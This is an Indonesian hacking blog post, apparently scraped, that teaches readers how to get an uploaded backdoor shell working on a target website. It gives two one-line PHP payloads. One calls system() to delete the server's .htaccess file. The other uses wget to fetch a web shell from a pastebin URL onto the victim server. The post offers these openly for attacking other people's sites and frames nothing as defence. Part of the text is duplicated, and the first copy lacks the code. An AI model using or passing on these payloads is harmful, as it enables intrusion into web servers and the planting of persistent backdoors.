Tuesday, July 28, 2020
Yow halo exploiter, balik lagi bersama admin di situs ini lagi :b, sudah seminggu lebih gak buat artikel, biasanya dalam seminggu ada 2 artikel, tapi karena saya sekarang sudah sibuk, jadinya jarang buat artikel lagi, disini saya akan menjelaskan cara bypass upload shell backdoor dengan one line command shell.
mungkin ketika kalian upload shell, saat di akses malah ke download atau mungkin juga pas di akses malah 403 forbidden, dll. ok one line command / perintah satu baris, "perintah apaan bang ?". perintah linux gan. ok disini saya punya contoh situs. test.xploitsecid.or.id pas saya upload shell backdoor berhasil, dan ketika saya mengaksesnya malah terdownload
buat file dengan nama oneline.php dan isi filenya dengan command kalian, misalnya disini saya akan menghapus .htaccessnya karena mungkin saja file terdownload akibat .htaccessnya
maka command yg akan saya masukkan adalah
kemudian akses oneline.php maka commandnya akan tereksekusi. dan .htaccess pun ter delete
dan jika kalian ingin spawn shell ke servernya tinggal isi file oneline.php dengan
and boom
ok mungkin itu saja yg bisa saya sampaikan, jika kurang paham bisa berkomentar dibawah.
mungkin ketika kalian upload shell, saat di akses malah ke download atau mungkin juga pas di akses malah 403 forbidden, dll. ok one line command / perintah satu baris, "perintah apaan bang ?". perintah linux gan. ok disini saya punya contoh situs. test.xploitsecid.or.id pas saya upload shell backdoor berhasil, dan ketika saya mengaksesnya malah terdownload
buat file dengan nama oneline.php dan isi filenya dengan command kalian, misalnya disini saya akan menghapus .htaccessnya karena mungkin saja file terdownload akibat .htaccessnya
<?php system('rm .htaccess');?>upload ke web target kalian
dan jika kalian ingin spawn shell ke servernya tinggal isi file oneline.php dengan
<?php system('wget https://pastebin.com/raw/tizUkMj9 -O linuxploit.php');?>kemudian upload dan akses, shell akan terdownload tapi command akan tereksekusi dan akses shell kalian "linuxploit.php"
and boom
ok mungkin itu saja yg bisa saya sampaikan, jika kurang paham bisa berkomentar dibawah.